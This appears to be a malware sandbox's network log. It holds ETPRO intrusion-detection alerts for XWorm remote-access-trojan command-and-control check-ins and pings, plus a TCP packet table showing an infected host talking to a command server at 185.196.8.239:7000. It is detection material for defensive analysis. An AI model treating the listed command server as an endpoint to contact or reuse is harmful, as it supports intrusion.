2024-12-05T19:41:50.797977+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:50.917747+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:55.895664+0100 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:56.183674+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:56.186173+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:56.328908+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:56.331341+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:41:56.498022+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:41:56.501294+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:06.073461+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:06.073461+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:08.885531+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:08.887117+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:12.117835+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:12.119563+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:22.726539+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:22.728656+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:22.868735+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:22.871805+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:23.040475+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:23.043784+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:23.183664+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:23.186431+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:26.601407+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:26.604303+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:28.023630+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:28.025141+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:33.680034+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:33.682516+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:36.096593+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:36.096593+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:38.227034+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:38.229933+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:38.418978+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:38.420604+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:43.696326+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:43.704189+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:43.888449+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:44.119844+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:46.372475+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:46.375024+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:42:58.883827+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:42:58.890884+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:04.245042+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:04.246700+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:04.437499+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:04.438814+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:05.040102+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:05.042164+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:06.096583+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:06.096583+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:14.274398+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:14.276672+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:14.415537+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:14.417228+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:14.594513+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:14.596237+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:14.834543+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:14.839916+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:22.322408+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:22.324503+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:24.696129+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:24.698239+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:29.688528+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:29.693242+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:29.881428+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
2024-12-05T19:43:29.883678+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49742 | 185.196.8.239 | 7000 | TCP
2024-12-05T19:43:36.090598+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 185.196.8.239 | 7000 | 192.168.2.4 | 49742 | TCP
                                                                                        2024-12-05T19:43:36.090598+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:40.196613+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:40.201444+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:41.339455+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:41.341754+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:42.024594+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:42.026533+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:54.541105+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:54.547027+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:56.823146+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:56.828046+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:57.103007+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:57.108010+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:44:06.093314+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:44:06.093314+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:44:08.658761+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:44:08.659555+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Dec 5, 2024 19:40:01.995919943 CET  49730  80  192.168.2.4  208.95.112.1
Dec 5, 2024 19:40:02.116771936 CET  80  49730  208.95.112.1  192.168.2.4
Dec 5, 2024 19:40:02.116842985 CET  49730  80  192.168.2.4  208.95.112.1
Dec 5, 2024 19:40:02.117707014 CET  49730  80  192.168.2.4  208.95.112.1
Dec 5, 2024 19:40:02.237591982 CET  80  49730  208.95.112.1  192.168.2.4
Dec 5, 2024 19:40:03.304946899 CET  80  49730  208.95.112.1  192.168.2.4
Dec 5, 2024 19:40:03.347439051 CET  49730  80  192.168.2.4  208.95.112.1
Dec 5, 2024 19:40:33.851852894 CET  49740  443  192.168.2.4  149.154.167.220
Dec 5, 2024 19:40:33.851895094 CET  443  49740  149.154.167.220  192.168.2.4
Dec 5, 2024 19:40:33.852011919 CET  49740  443  192.168.2.4  149.154.167.220
Dec 5, 2024 19:40:33.871160984 CET  49740  443  192.168.2.4  149.154.167.220
Dec 5, 2024 19:40:33.871187925 CET  443  49740  149.154.167.220  192.168.2.4
Dec 5, 2024 19:40:35.243087053 CET  443  49740  149.154.167.220  192.168.2.4
Dec 5, 2024 19:40:35.243175030 CET  49740  443  192.168.2.4  149.154.167.220
Dec 5, 2024 19:40:35.245450020 CET  49740  443  192.168.2.4  149.154.167.220
Dec 5, 2024 19:40:35.245455027 CET  443  49740  149.154.167.220  192.168.2.4
Dec 5, 2024 19:40:35.245825052 CET  443  49740  149.154.167.220  192.168.2.4
Dec 5, 2024 19:40:35.296448946 CET  49740  443  192.168.2.4  149.154.167.220
Dec 5, 2024 19:40:35.343333960 CET  443  49740  149.154.167.220  192.168.2.4
Dec 5, 2024 19:40:35.861960888 CET  443  49740  149.154.167.220  192.168.2.4
Dec 5, 2024 19:40:35.862073898 CET  443  49740  149.154.167.220  192.168.2.4
Dec 5, 2024 19:40:35.867651939 CET  49740  443  192.168.2.4  149.154.167.220
Dec 5, 2024 19:40:35.882343054 CET  49740  443  192.168.2.4  149.154.167.220
Dec 5, 2024 19:40:36.187557936 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:40:36.307568073 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:40:36.307650089 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:40:36.357579947 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:40:36.477538109 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:40:48.866202116 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:40:48.988234997 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:40:49.279298067 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:40:49.322469950 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:40:49.442348957 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:01.382441044 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:01.502264023 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:01.792136908 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:01.794409990 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:01.915745020 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:06.078519106 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:06.316313028 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:13.895421028 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:14.015795946 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:14.306493044 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:14.308474064 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:14.429714918 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:19.101371050 CET  80  49730  208.95.112.1  192.168.2.4
Dec 5, 2024 19:41:19.101439953 CET  49730  80  192.168.2.4  208.95.112.1
Dec 5, 2024 19:41:26.410706043 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:26.530697107 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:26.820478916 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:26.822738886 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:26.942806005 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:36.074500084 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:36.128921986 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:38.926145077 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:39.046004057 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:39.346853971 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:39.348558903 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:39.471750021 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:43.394783974 CET  49730  80  192.168.2.4  208.95.112.1
Dec 5, 2024 19:41:43.514779091 CET  80  49730  208.95.112.1  192.168.2.4
Dec 5, 2024 19:41:43.629508018 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:43.749242067 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:43.749310017 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:43.869107962 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:43.869158983 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:43.988946915 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:44.039426088 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:44.042422056 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:44.162599087 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:44.186711073 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:44.189182043 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:44.353354931 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:44.354656935 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:44.357038975 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:44.477087975 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:49.519803047 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:49.639518976 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:49.930286884 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:49.932460070 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:50.052314997 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:50.052375078 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:50.172205925 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:50.172277927 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:50.292128086 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:50.292351961 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:50.412225008 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:50.493925095 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:50.504394054 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:50.604513884 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:50.624514103 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:50.627832890 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:50.748508930 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:50.796400070 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:50.797976971 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:50.917655945 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:50.917747021 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:50.940540075 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:51.051028013 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:51.081512928 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:51.081679106 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:51.201649904 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:55.771337032 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:55.895565033 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:55.895663977 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:56.015903950 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:56.015991926 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:56.136629105 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:56.183674097 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:56.186172962 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:56.305918932 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:56.328907967 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:56.331341028 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:56.497447014 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:56.498022079 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:41:56.501293898 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:41:56.624603987 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:06.073461056 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:06.144622087 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:08.474266052 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:08.594216108 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:08.885530949 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:08.887116909 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:09.007143974 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:11.707806110 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:11.827825069 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:12.117835045 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:12.119563103 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:12.239248037 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:22.316967010 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:22.436681986 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:22.436754942 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:22.556427002 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:22.556670904 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:22.676593065 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:22.726538897 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:22.728656054 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:22.848611116 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:22.868735075 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:22.871804953 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:23.033428907 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:23.040474892 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:23.043783903 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:23.163444042 CET  7000  49742  185.196.8.239  192.168.2.4
